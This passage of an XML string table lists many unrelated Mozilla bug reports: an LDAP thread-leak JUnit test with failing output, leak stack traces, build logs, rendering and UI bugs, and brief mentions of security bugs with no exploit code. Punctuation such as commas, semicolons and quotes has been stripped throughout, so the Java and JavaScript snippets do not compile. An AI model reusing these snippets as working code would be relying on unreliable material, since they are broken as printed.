     *  leave Java VM alive by checking the number of connections to referral
     *  ldap server (netstat -a | grep portnumber)
     */
    public void testAuthenticateWithWrongPassword() {
        int activeCountBefore = Thread.activeCount()
        try {
            conn.authenticate(dn2 pw2)
            fail(fail to throw LDAPException with invalid credential message)
        }
        catch (LDAPException e) {
        }
        int activeCountAfterRead = Thread.activeCount()
        // if the following assert fail there is a thread leak
        assertEquals(There is a thread leak
                            activeCountBefore activeCountAfterRead)
    }
    /*  test  the conn is authenticated at
     *  a ldap server and read through a referral ldap server.
     *  read will finally call search. because it does not check all the
     *  results so hasMoreElements() does not reach the final point to close
     *  referral connection. it is a bug causes thread leak and connection
     *  resources leak. it can be seen with JBuilder debuger or leave Java VM
     *  alive by checking the number of connections to referral ldap server
     *  (netstat -a | grep portnumber)
     */
    public void testRead() {
        try {
            int activeCountBefore = Thread.activeCount()
            conn.read(employeenumber=Bmoe002ou=peopleo=qwest.com)
            int activeCountAfterRead = Thread.activeCount()
            // if the following assert fail there is a thread leak
            assertEquals(There is a thread leak
                            activeCountBefore activeCountAfterRead)
        }
        catch (LDAPException e) {
            e.printStackTrace()
            fail(read test failed)
        }
    }
   /*   the conn is authenticated at one ldap server and search through referral
    *   will create a thread to open a LDAPConnection to referral ldap server
    *   if not all results are obtained it leaves the thread alive and causes
    *   thread leak and connection resource leak. must warn developers and
    *   provide a function for developer to decide when to close referral
    *   connection after the search. When all results are obtained the thread
    *   is terminated although the connection sockets (monitor from netstat -a)
    *   which are in TIME WAIT status instead of ESTABLISHED will eventually
    *   go away not sure if these are some resources need to be cleaned up
    *   after the thread is terminated
    */
    public void testSearch () {
    }
    public static Test suite() {
        TestSuite suite = new TestSuite()
        suite.addTest(new LDAPConnectionTest(testAuthenticate))
        suite.addTest(new LDAPConnectionTest   
(testAuthenticateWithWrongPassword))
        suite.addTest(new LDAPConnectionTest(testRead))
        //suite.addTest(new LDAPConnectionTest(testSearch))
        return suite
    }
    public static void main(String[] args) {
        TestRunner.run(suite())
    }
}
.F.F.F
Time: 9.193
FAILURES!!!
Test Results:
Run: 3 Failures: 3 Errors: 0
There were 3 failures:
1) testAuthenticate(LDAPConnectionTest) authentication failed
2) testAuthenticateWithWrongPassword(LDAPConnectionTest) There is a thread 
leak expected: but was:
3) testRead(LDAPConnectionTest) There is a thread leak expected: but 
was:</t>
  </si>
  <si>
    <t>miodrag</t>
  </si>
  <si>
    <t>hanbin.pang</t>
  </si>
  <si>
    <t>CORE-740069</t>
  </si>
  <si>
    <t>Land Paris Bindings and use them for XMLHttpRequest</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-426616</t>
  </si>
  <si>
    <t>Acid2 chin is 1px too tall in FF3b5</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.9b5) Gecko/2008032620 Firefox/3.0b5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.9b5) Gecko/2008032620 Firefox/3.0b5
After comparing the test with the reference youÂ´ll see a additional line in the test-face that should not be there
Reproducible: Always
Steps to Reproduce:
1.Go to acid2.acidtests.org
2.Take the Test
3.Compare it with the reference
Actual Results:  
You will see there is a additional Line that should not be there</t>
  </si>
  <si>
    <t>ufdada</t>
  </si>
  <si>
    <t>WEBSITES-435141</t>
  </si>
  <si>
    <t>Would like my blog published on mozilla.blogs</t>
  </si>
  <si>
    <t>URL is http://jboriss.wordpress.com/</t>
  </si>
  <si>
    <t>jboriss</t>
  </si>
  <si>
    <t>CORE-146034</t>
  </si>
  <si>
    <t>nsHTMLIIDs.{hcpp} must die</t>
  </si>
  <si>
    <t>Those files define static IID's for no good reason NS_GET_IID is what we
want... Patch coming up...</t>
  </si>
  <si>
    <t>CALENDAR-373562</t>
  </si>
  <si>
    <t>All day events should be printed at the top</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 pl rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9a3pre) Gecko/20070308 Calendar/0.6a1
Bug 349960 has been verified for displaying but the problem still exists for printing
Reproducible: Always
Steps to Reproduce:
1. Create event set from and to time
2. Create second event: the same date mark as All day
3. Print it use monthly or weekly view
Actual Results:  
All day event is not printed first
Expected Results:  
All day events should be printed at the top as in bug 349960</t>
  </si>
  <si>
    <t>yahoocbien-dev</t>
  </si>
  <si>
    <t>CORE-50866</t>
  </si>
  <si>
    <t>MLK: AsyncReadStreamAdaptor out of nsMemCacheChannel::AsyncRead()</t>
  </si>
  <si>
    <t>This leaked after loading after loading www.visa-asia.com and then sitting there
while I filed a bunch of other leak bugs. 
        MLK: 56 bytes leaked at 0x9b1f78
         This memory was allocated from:
               malloc         [rtlib.o]
               __bUiLtIn_nEw  [libxpcom.so]
               __builtin_new  [rtlib.o]
               nsMemCacheChannel::AsyncRead(nsIStreamListener*nsISupports*) [nsMemCacheChannel.cpp:520]
                      if (NS_FAILED(rv)) return rv
                      AsyncReadStreamAdaptor *asyncReadStreamAdaptor
               =&gt;     asyncReadStreamAdaptor = new AsyncReadStreamAdaptor(this inputStream)
                      if (!asyncReadStreamAdaptor)
                          return NS_ERROR_OUT_OF_MEMORY
                      NS_ADDREF(asyncReadStreamAdaptor)
               nsCacheEntryChannel::AsyncRead(nsIStreamListener*nsISupports*) [nsCacheEntryChannel.cpp:199]
               nsHTTPChannel::ProcessNotModifiedResponse(nsIStreamListener*) [nsHTTPChannel.cpp:2423]
               nsHTTPChannel::ProcessStatusCode() [nsHTTPChannel.cpp:2279]
               nsHTTPChannel::FinishedResponseHeaders() [nsHTTPChannel.cpp:2163]
               nsHTTPServerListener::FinishedResponseHeaders() [nsHTTPResponseListener.cpp:1036]
               nsHTTPServerListener::OnDataAvailable(nsIChannel*nsISupports*nsIInputStream*unsigned intunsigned int) [nsHTTPResponseListener.cpp:363]
               nsOnDataAvailableEvent::HandleEvent() [nsAsyncStreamListener.cpp:400]
               nsStreamListenerEvent::HandlePLEvent(PLEvent*) [nsAsyncStreamListener.cpp:97]
               PL_HandleEvent [plevent.c:587]
               PL_ProcessPendingEvents [plevent.c:528]
               nsEventQueueImpl::ProcessPendingEvents() [nsEventQueue.cpp:356]
               event_processor_callback(void*intGdkInputCondition) [nsAppShell.cpp:158]
               our_gdk_io_invoke(_GIOChannel*GIOConditionvoid*) [nsAppShell.cpp:58]
               g_io_unix_dispatch [giounix.c:135]
               g_main_dispatch [gmain.c:656]
               g_main_iterate [gmain.c:877]
               g_main_run     [gmain.c:935]
               gtk_main       [gtkmain.c:476]
               nsAppShell::Run() [nsAppShell.cpp:335]
               nsNativeViewerApp::Run() [nsGtkMain.cpp:59]
               main           [nsGtkMain.cpp:181]</t>
  </si>
  <si>
    <t>rpotts</t>
  </si>
  <si>
    <t>BUGZILLA-164623</t>
  </si>
  <si>
    <t>xml.cgi - attachments is broken and insiders not enforced</t>
  </si>
  <si>
    <t>xml.cgi never prints an attachment and does not check isprivate</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-283598</t>
  </si>
  <si>
    <t>Give the firefox .dmg a nice icon</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O de-DE rv:1.7.6) Gecko/20050223 Firefox/1.0.1
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O de-DE rv:1.7.6) Gecko/20050223 Firefox/1.0.1
The .dmg linked in the URL has a nice custom Icon.
I think firefox (and the other Mozilla Apps) deserve a custom Icon too
Reproducible: Always</t>
  </si>
  <si>
    <t>u49640</t>
  </si>
  <si>
    <t>CALENDAR-247063</t>
  </si>
  <si>
    <t>Move Sunbird profile folder to mozilla/sunbird</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.7) Gecko/20040614 Firefox/0.9
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-GB rv:1.7) Gecko/20040614 Firefox/0.9
Sunbird's profile folder should be in a place consistent with Firefox (and
eventually Tb presumably).
It'd be better to change it sooner rather than later so we don't have to worry
about any sort of automated migration. Sunbird isn't a product yet so there'll
be few users who aren't capable of moving the files themselves.
OTOH it might be better to finalise the name first but there's little gained by
waiting
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-341507</t>
  </si>
  <si>
    <t>Editbugs permission for Jonathan Chetwynd</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1a3) Gecko/20060528 Camino/1.0+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8.1a3) Gecko/20060528 Camino/1.0+
https://bugzilla.mozilla.org/show_bug.cgi?id=267664
https://bugzilla.mozilla.org/show_bug.cgi?id=112393
Reproducible: Always
thanks aaron</t>
  </si>
  <si>
    <t>CORE-805917</t>
  </si>
  <si>
    <t>BaselineCompiler: x86-64 support</t>
  </si>
  <si>
    <t>Fix baseline compiler to build on X86-64.</t>
  </si>
  <si>
    <t>MOZILLA_LABS_GRAVEYARD-511512</t>
  </si>
  <si>
    <t>Need way to automatically evaluate user's tech level</t>
  </si>
  <si>
    <t>Because users will over or under evaluate their own tech level it would be good to have a non-survey-based way to gauge this level so we can use it to bucket test data uploads into different groups.
Also this should be built into the chrome so that we can associate the tech level with the uploaded test data.</t>
  </si>
  <si>
    <t>MOZILLA_LABS-376388</t>
  </si>
  <si>
    <t>Joey Addon - First Run startup option</t>
  </si>
  <si>
    <t>[ ] We need first run function 
[ ] We will spawn Options Preferences Panel in this condition.</t>
  </si>
  <si>
    <t>TESTING-834027</t>
  </si>
  <si>
    <t>Better diagnostics when FennecNativeDriver.getSurfaceView fails</t>
  </si>
  <si>
    <t>I have seen some robocop failures where it appears that getSurfaceView has returned null but there is no indication in the logcat of the cause. We can detect the failure and dump some view information in hopes of shedding light on the problem.</t>
  </si>
  <si>
    <t>gbrown</t>
  </si>
  <si>
    <t>NSS-413010</t>
  </si>
  <si>
    <t>CERT_CompareRDN may return a false match</t>
  </si>
  <si>
    <t>If CERT_CompareRDN finds an attribute type in the first RDN that is not 
also present in the second RDN it returns SECEqual which signifies that
the two names matched.  
This bug was introduced in rev 1.21 of secname.c which was a fix for 
Bug 210584.  It affects only the trunk.
One-line patch forthcoming.</t>
  </si>
  <si>
    <t>CORE-70918</t>
  </si>
  <si>
    <t>view source adds missing &gt; (greater than sign/right angle bracket)</t>
  </si>
  <si>
    <t>BUILD:  2001-03-05-05 on Linux
Load the following HTML:
&lt;table style=width: 100 height: 100
      Some text
Now view the source.  Observe that a &gt; is inserted after the &lt;table tag (on
the following line).  I would expect view source to show the actual source.</t>
  </si>
  <si>
    <t>CORE-227733</t>
  </si>
  <si>
    <t>Live resize is possible for BeOS widget implementation.</t>
  </si>
  <si>
    <t>Some times ago we decided to create native windows with B_OUTLINE_RESIZE flag due 
overhead of resize events generated.
One of reason of that event's flood was existence of OnResize() call in Resize()
method.
So previous porting team create tricky workaround with ResizeRunner. Which
didn't help well though.
Now i tried straight logical way like it was done in MSWindow port.
added B_FRAME_EVENTS flag to both nsWindowsBeOS and nsView BeOS
implemented nsViewBeOS::FrameResized() and rewrote 
nsWindowBeOS::FrameResized().
So both those now calls async method with ONRESIZE tag.
Removed B_OUTLINE_RESIZE flag removed ResizeRunner and DoFrameResize.
Also removed OnResize() from Resize() method.
All seems working quite nice. Resize with content seems even more smooth than in
NetPositive.
Contunue testing for unwanted effects
It seems that</t>
  </si>
  <si>
    <t>CORE-331782</t>
  </si>
  <si>
    <t>js_GetAnyName needs to root qn across call to js_NewObject</t>
  </si>
  <si>
    <t>js_GetAnyName needs to root qn across the call to js_NewObject and perhaps JS_SetPrivate (and perhaps obj for longer than that I'm not sure how long cx-&gt;newborn[GCX_OBJECT] is guaranteed to hold obj).  Otherwise it can be destroyed here:
js_GC (/home/dbaron/builds/trunk/mozilla/js/src/jsgc.c:2148)
js_NewGCThing (/home/dbaron/builds/trunk/mozilla/js/src/jsgc.c:668)
js_NewObject (/home/dbaron/builds/trunk/mozilla/js/src/jsobj.c:2021)
js_GetAnyName (/home/dbaron/builds/trunk/mozilla/js/src/jsxml.c:7741)
js_InitAnyNameClass (/home/dbaron/builds/trunk/mozilla/js/src/jsxml.c:7415)
JS_ResolveStandardClass (/home/dbaron/builds/trunk/mozilla/js/src/jsapi.c:1423)
BackstagePass::NewResolve(nsIXPConnectWrappedNative* JSContext* JSObject* long unsigned int JSObject** int*) (/home/dbaron/builds/tXPC_WN_Helper_NewResolve (/home/dbaron/builds/trunk/mozilla/js/src/xpconnect/src/xpcwrappednativejsops.cpp:1061)
js_LookupPropertyWithFlags (/home/dbaron/builds/trunk/mozilla/js/src/jsobj.c:2780)
js_FindConstructor (/home/dbaron/builds/trunk/mozilla/js/src/jsobj.c:2130)
js_GetClassPrototype (/home/dbaron/builds/trunk/mozilla/js/src/jsobj.c:3926)
js_NewObject (/home/dbaron/builds/trunk/mozilla/js/src/jsobj.c:2000)
js_GetAnyName (/home/dbaron/builds/trunk/mozilla/js/src/jsxml.c:7741)
(I saw this crash in the JS shell as well presumably with a different deallocation stack.)</t>
  </si>
  <si>
    <t>RELEASE_ENGINEERING-422438</t>
  </si>
  <si>
    <t>qm-pmac-trunk04 crashing in tsvg then claiming success</t>
  </si>
  <si>
    <t>Since sometime the evening of March 9th qm-pmac-trunk04 (the *other* failing 10.5 talos box) has been crashing in its first test not trying any more but calling that success so although it doesn't report any numbers to tinderbox it's still green so nobody has noticed or cared.
tail of the log:
Running test tsvg: 
		Started Tue 11 Mar 2008 21:34:33
2008-03-11 21:34:35.844 firefox-bin[22442:10b] _NXPlaceWindow: error setting window shape (1000)
2008-03-11 21:34:35.847 firefox-bin[22442:10b] _NSShapeRoundedWindowWithWeighting: error setting window shape (1000)
	Screen width/height:1280/1024
	colorDepth:24
	Browser inner width/height: 1024/658
	Browser outer width/height: 1024/768
2008-03-11 21:34:44.398 firefox-bin[22467:10b] NSInternalInconsistencyException: Error (1007) creating CGSWindow
WARNING: problem starting counter monitor
FAIL: browser crash
Failed tsvg: 
		Stopped Tue 11 Mar 2008 21:35:53
FAIL: failure to complete test: tsvg</t>
  </si>
  <si>
    <t>FIREFOX-355597</t>
  </si>
  <si>
    <t>Firefox not starting with the Talkback extension enabled</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1) Gecko/20060918 Firefox/2.0 XpcomViewer/0.9
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.1) Gecko/20060918 Firefox/2.0 XpcomViewer/0.9
I used the windowsupdate.com site to install a number of non-critical updates
(most of them for hardware such as WLAN card modem mouse touchpad etc.)
and I was prompted to restart the computer.  After the restart Firefox wouldn't start.  Each attempt at starting Firefox would lead the firefox.exe process to terminate almost immediately *without* causing a crash.  So unfortunately there are no talkback IDs to report.  Check out bug #355594 which is a similar problem on the same machine and at the same time happening with Thunderbird as well.
Reproducible: Always
Steps to Reproduce:
1. Try to start Firefox.
2. Watch nothing happening (because the process is silently terminating.)
3. Start Firefox in Safe Mode.
4. Disable the Talkback extension.
5. Close Firefox.
6. Start Firefox in normal mode.
7. Watch the browser open fine.
8. Enable the Talkback extension.
9. Restart Firefox.
10. Watch nothing happening (like before.)
I could go on and on with the same procedure.
about:buildconfig
Build platform
target
i586-pc-msvc
Build tools
Compiler 	Version 	Compiler flags
$(CYGWIN_WRAPPER) cl 	12.00.8804 	-TC -nologo -W3 -Gy -Fd$(PDBFILE)
$(CYGWIN_WRAPPER) cl 	12.00.8804 	-TP -nologo -W3 -Gy -Fd$(PDBFILE)
Configure arguments
--enable-application=browser --enable-update-channel=release --enable-official-branding --enable-optimize --disable-debug --disable-tests --enable-static --disable-shared --enable-svg --enable-canvas --enable-update-packaging</t>
  </si>
  <si>
    <t>BUGZILLA-237840</t>
  </si>
  <si>
    <t>linkification of attachment N links is case sensitive</t>
  </si>
  <si>
    <t>Linkification of attachment N links is case sensitive -- Attachment N
doesn't get linkified (as Bug N does).  Compare:
bug 237407 comment 16
bug 237407 comment 17</t>
  </si>
  <si>
    <t>goobix</t>
  </si>
  <si>
    <t>FIREFOX-267140</t>
  </si>
  <si>
    <t>Language errors and introduction of help in nb-NO Firefox translation</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 nb-NO rv:1.7.3) Gecko/20041027 Firefox/1.0RC1
Build Identifier: 
Multiple fixes in nb-NO translation. Also included Help.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>FIREFOX-388192</t>
  </si>
  <si>
    <t>Remove gopher OS integration support</t>
  </si>
  <si>
    <t>This will remove a potential attack vector as seen with
http://larholm.com/2007/06/12/safari-for-windows-0day-exploit-in-2-hours/
This bug is not about removing the gopher protocol entirely</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-302606</t>
  </si>
  <si>
    <t>In Camino Preferences the preference settings are empty/blank</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC en-US rv:0.9.2) Gecko/2001
Build Identifier: Mozilla/5.0 (Macintosh U PPC en-US rv:0.9.2) Gecko/2001
When accessing Camino Preferences the preference settings suddenly are
empty/blank. This seems to have happened since CaminoBlock CaminoSearch.
CaminoOptions &amp; CaminoFlash extensions were added.
Clicking on the preference category makes no difference as all display as blank.
Restarting Camino restores the preference details for change/editing. But
subsequent access to Camino preferences reintroduces the problem.
Reproducible: Always</t>
  </si>
  <si>
    <t>fvanlaar</t>
  </si>
  <si>
    <t>CALENDAR-470197</t>
  </si>
  <si>
    <t>Update installer for Sunbird</t>
  </si>
  <si>
    <t>The installer needs to be updated to take advantage of the changes used by all other applications and to allow using the Unicode version of NSIS.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-509852</t>
  </si>
  <si>
    <t>Run yslow testing as a cron job</t>
  </si>
  <si>
    <t>To reduce complexity of Cesium we should run the yslow tests on a cronjob once/day. 
Specs:
* Run every 15 minutes
* Checks for a pid before running exits if it finds one
* Creates a pid file when running
* Query db for all sites that have a last run time &gt;=24 hours or is NULL
* Run yslow on all pages for sites that were found
* Write to log file pages tested and errors
* Exit and remove pid</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-366658</t>
  </si>
  <si>
    <t>remora treats empty 'Email address' valid (?)</t>
  </si>
  <si>
    <t>let 'Email address' field empty and press submit then i got:
Email address [  ]
This email address is already taken by another user.</t>
  </si>
  <si>
    <t>CORE-75250</t>
  </si>
  <si>
    <t>empty table width attribute treated as zero table width</t>
  </si>
  <si>
    <t xml:space="preserve">with the following html the table is rendered as if a zero table width were
specified. (http://doc.weblogs.com/ is the site where i noticed this issue.) i
won't pretend to be enough of a standards wonk to say whether this is strictly
wrong but it appears to be inconsistent with netscape 4 and internet explorer.
(if you remove the 'width=' from the table element the text renders on one
line. with it there it only renders as wide as the widest word.)
test
this is a simple test.
</t>
  </si>
  <si>
    <t>jimw-mo</t>
  </si>
  <si>
    <t>SEAMONKEY-233721</t>
  </si>
  <si>
    <t>Port of Firefox bug 182928 to Seamonkey (Add confirmation for Set As Wallpaper)</t>
  </si>
  <si>
    <t>See Firefox bug 182928.
I think this is a good idea and there is no reason Seamonkey shouldn't have
this too.</t>
  </si>
  <si>
    <t>BUGZILLA-152632</t>
  </si>
  <si>
    <t>'My Bugs' in footer doesn't reflect mybugstemplate param</t>
  </si>
  <si>
    <t>If you change the 'mybugstemplate' parameter this change is reflected on the
front page but not in the footer. It turns out that the 'My Bugs' query is
hard-coded into the footer. The footer should instead read the query from the
'mybugstemplate' parameter.
This can be fixed by changing line 101 of file
'template/en/default/global/useful-links.html.tmpl' from:
          &lt;a
href=buglist.cgi?bug_status=NEWbug_status=ASSIGNEDbug_status=REOPENEDemail1=[%
user.login FILTER url_quote
%]emailtype1=exactemailassigned_to1=1emailreporter1=1&gt;MyBugs
to:
          MyBugs
i.e. remove the hard-coding of the 'My Bugs' query.</t>
  </si>
  <si>
    <t>THUNDERBIRD-216209</t>
  </si>
  <si>
    <t>request: renaming folders by pressing F2</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 6.0 Windows NT 5.1)
Build Identifier: Thunderbird 0.2a (20030807)
Many programs support renaming folders by pressing the F2 key for example the 
Windows Explorer. Thunderbird should allow that too.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-129214</t>
  </si>
  <si>
    <t>Bad HTML coding - pages cannot resize</t>
  </si>
  <si>
    <t xml:space="preserve">At this and some other pages the pages have a fixed width (intentionally or
otherwise which makes them impossible to resize (downward) past a certain
point. This certain point is too wide for the default window width in MacOS even
under 1024x768 (in Mozilla and probably in most/all other browsers) and would be
too wide for probably any os/browser under 800x600 or smaller.  The end result
is that users are either forced to resize the window (if they can) or to
side-scroll annoyedly.
Pages should NEVER be given a fixed width intentionally unless extensive
platform and monitor mode detection takes place and a custom version of the page
is provided based on that data.  Care should be taken to prevent accidental
fixture of the window width at an unnecessarily wide point e.g. by overly-wide
banners form entry fields long unbroken text strings etc.
</t>
  </si>
  <si>
    <t>mech_filter</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-267559</t>
  </si>
  <si>
    <t>several spelling mistakes in german firefox translation</t>
  </si>
  <si>
    <t>There are several spelling mistakes in several files of the german firefox
translation.</t>
  </si>
  <si>
    <t>NSS-110356</t>
  </si>
  <si>
    <t>buildfailures though checked in generated files (oiddata.h)</t>
  </si>
  <si>
    <t>The iPlanet nightly builds / dial a builds fail:
Solaris:
...Start Extract from
/share/builds/mccrel/nss/nsstip/logs/20011115.2/booboo_Solaris8/gmake-optimize-domestic.log.1.err...
---------
gmake[2]: Entering directory
`/share/builds/mccrel/nss/nsstip/builds/20011115.2/booboo_Solaris8/mozilla/security/nss/lib/dev'
cc -o SunOS5.8_OPT.OBJ/devtoken.o -c -O -KPIC -DSVR4 -DSYSV -D__svr4 -D__svr4__
-DSOLARIS -D_REENTRANT -DSOLARIS2_8 -D_SVID_GETTOD -xarch=v8 -DXP_UNIX
-DNSS_3_4_CODE -UDEBUG -DNDEBUG -I/usr/dt/include -I/usr/openwin/include
-I../../../../dist/SunOS5.8_OPT.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/nspr  devtoken.c
../../../../dist/public/security/nsspki1.h line 57: cannot find include file:
oiddata.h
cc: acomp failed for devtoken.c
gmake[2]: *** [SunOS5.8_OPT.OBJ/devtoken.o] Error 2
gmake[2]: Leaving directory
`/share/builds/mccrel/nss/nsstip/builds/20011115.2/booboo_Solaris8/mozilla/security/nss/lib/dev'
---------
gmake[1]: *** [libs] Error 2
gmake[1]: Leaving directory
`/share/builds/mccrel/nss/nsstip/builds/20011115.2/booboo_Solaris8/mozilla/security/nss/lib'
-------------------
AIX:
...Start Extract from
/share/builds/mccrel/nss/nsstip/logs/20011115.2/masala_AIX4.3/gmake-optimize64-domestic.log.1.err...
---------
gmake[2]: Entering directory
`/share/builds/mccrel/nss/nsstip/builds/20011115.2/booboo_Solaris8/mozilla/security/nss/lib/dev'
xlC_r -o AIX4.3_64_OPT.OBJ/devtoken.o -c -O -DAIX -DSYSV -qarch=com -DAIX_64BIT
-DAIX4_3 -DXP_UNIX -DNSS_3_4_CODE -UDEBUG -DNDEBUG
-I../../../../dist/AIX4.3_64_OPT.OBJ/include  -I../../../../dist/public/security
-I../../../../dist/private/security -I../../../../dist/public/security
-I../../../../dist/public/nspr  devtoken.c
../../../../dist/public/security/nsspki1.h line 57.10: 1506-296 (S) #include
file oiddata.h not found.
gmake[2]: *** [AIX4.3_64_OPT.OBJ/devtoken.o] Error 1
gmake[2]: Leaving directory
`/share/builds/mccrel/nss/nsstip/builds/20011115.2/booboo_Solaris8/mozilla/security/nss/lib/dev'
---------
gmake[1]: *** [libs] Error 2
gmake[1]: Leaving directory
`/share/builds/mccrel/nss/nsstip/builds/20011115.2/booboo_Solaris8/mozilla/security/nss/lib'
Relyea wrote:
Last night Nelson found a Linux system that was failing in the same way. If you
go to the build area and remove mozilla/security/nss/lib/pki1/oiddata.h do a
repull and a rebuild everything should work. oiddata.h is always built but it
is now build into $OBJDIR/oiddata.h It's existance in the root is confusing the
make rules.
This is not possible for me to do since it is an automated system the builds
are non incremental build in a completely fresh area. Tinderboxes do not fail
they are build with a slightly different system.
I will attach a full build log for Solaris (masterbuild)</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-422817</t>
  </si>
  <si>
    <t>Request unittest be run on trunk thunderbird</t>
  </si>
  <si>
    <t>One per platform for each existing tinderbox.</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-519782</t>
  </si>
  <si>
    <t>Stage pfs2.stage.mozilla.com access logs</t>
  </si>
  <si>
    <t>I need access to the last few days of access logs from the server
pfs2.stage.mozilla.com
This has data we need to bootstrap the new PFS2 database of plugin information.
Logs since last Friday would be perfect.
Thanks!</t>
  </si>
  <si>
    <t>FIREFOX_BUILD_SYSTEM-298647</t>
  </si>
  <si>
    <t>xcode might put build products in silly places</t>
  </si>
  <si>
    <t>Upon starting Xcode for the first time the user is offered a choice of putting
build products adjacent to the project in the build directory or sticking
them in some other far-off folder of the user's choosing.  We expect build
products to be in the former location but at least one user reported build
trouble which was traced to build products being stored in the outer Hebrides.
If possible we should handle this situation gracefully.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-435952</t>
  </si>
  <si>
    <t>Report Broken Website: Disability Access reason not translated</t>
  </si>
  <si>
    <t>in the Report Broken Website dialog the Disability Access problem type is not translated while the other types are.</t>
  </si>
  <si>
    <t>tsahi_75</t>
  </si>
  <si>
    <t>CORE-516372</t>
  </si>
  <si>
    <t>random failure in test_bug322588.html | unexpected events - got  unload expected  unload load</t>
  </si>
  <si>
    <t>http://tinderbox.mozilla.org/showlog.cgi?log=Firefox-Unittest/1252904275.1252906241.1595.gz
Linux mozilla-central test mochitests on 2009/09/13 21:57:55
18931 INFO Running /tests/content/events/test/test_bug322588.html...
18932 ERROR TEST-UNEXPECTED-FAIL | /tests/content/events/test/test_bug322588.html | unexpected events - got  unload expected  unload load</t>
  </si>
  <si>
    <t>TAMARIN_GRAVEYARD-423583</t>
  </si>
  <si>
    <t>true false and null are misinterpreted at the start of expressions</t>
  </si>
  <si>
    <t>Apparently these keywords are treated like variable names if they start expressions:
./main.sh
es&gt; null
ReferenceError: Error #1065: Variable null is not defined.</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-185979</t>
  </si>
  <si>
    <t>Java: _NSAutoreleaseNoPool() - just leaking</t>
  </si>
  <si>
    <t>Whith Build 1217 on Colorizer page if you click the About button (top
right of applet not the About text link) you get the following console message.
2002-12-18 11:54:53.571 Navigator[421] *** _NSAutoreleaseNoPool(): Object
0x3ea6640 of class NSCarbonWindowContentView autoreleased with no pool in place
- just leaking
With Build 1210 (NOT 1217) on Colorizer page if you click the About button you
get the following console messages.
You can not close that window with the Red close button must use the OK at the
bottom of that About window.
2002-12-18 07:46:11.613 Navigator[2154] *** _NSAutoreleaseNoPool(): Object
0x2462a90 of class NSCarbonWindowContentView autoreleased with no pool in place
- just leaking
If you click again on the About that console message is no more shown.
You have to go to another page then go back or reload no matter and then it
will show again when you click on the About button.
2002-12-18 07:50:52.119 Navigator[2162] *** _NSAutoreleaseNoPool(): Object
0x1f2a130 of class NSCarbonWindowContentView autoreleased with no pool in place
- just leaking
2002-12-18 07:54:42.190 Navigator[2162] *** _NSAutoreleaseNoPool(): Object
0x24d7cc0 of class NSCarbonWindowContentView autoreleased with no pool in place
- just leaking
Quit Chimera or Close the Window:
Dec 18 07:48:08 localhost
/Applications/Chimera/Navigator.app/Contents/MacOS/Navigator:
kCGErrorIllegalArgument : CGSSetTrackingAreaEnabled: Invalid window</t>
  </si>
  <si>
    <t>stf</t>
  </si>
  <si>
    <t>CORE-470795</t>
  </si>
  <si>
    <t>TM: correctness bug due to tracing inside with and shadowing after trace is recorded</t>
  </si>
  <si>
    <t>var o = [{}{}{i:42}]
var i
for (var j = 0 j &lt; 3 ++j) {
  with (o[j]) {
    for (i = 0 i &lt; 2 ++i) {
      print('' + j +   + i) 
    } 
  }
}
Output without JIT:
0 0
0 1
1 0
1 1
2 0
2 1
Output with JIT:
0 0
0 1
1 0
1 1
2 2</t>
  </si>
  <si>
    <t>NSS-195914</t>
  </si>
  <si>
    <t>NSS startup/shutdown memory leaks..</t>
  </si>
  <si>
    <t>Purify shows several NSS memory leaks in starup and shutdown.</t>
  </si>
  <si>
    <t>CALENDAR-309734</t>
  </si>
  <si>
    <t>Lightning Only</t>
  </si>
  <si>
    <t>Double clicking on an empty space in the calendar should create a new event.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b5) Gecko/20050922 Firefox/1.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8b5) Gecko/20050922 Firefox/1.4
Double clicking on an empty space in the calendar should create a new event
just like in sunbird.
Reproducible: Always
Steps to Reproduce:
Dounbleclick somewhere in the calendar view.
Actual Results:  
Nothing hapens
Expected Results:  
A new Event should be created -&gt; Sunbird
Related to bug 309426</t>
  </si>
  <si>
    <t>morty</t>
  </si>
  <si>
    <t>CORE-202086</t>
  </si>
  <si>
    <t>Move atk specific code from xp dir to accessible/src/atk</t>
  </si>
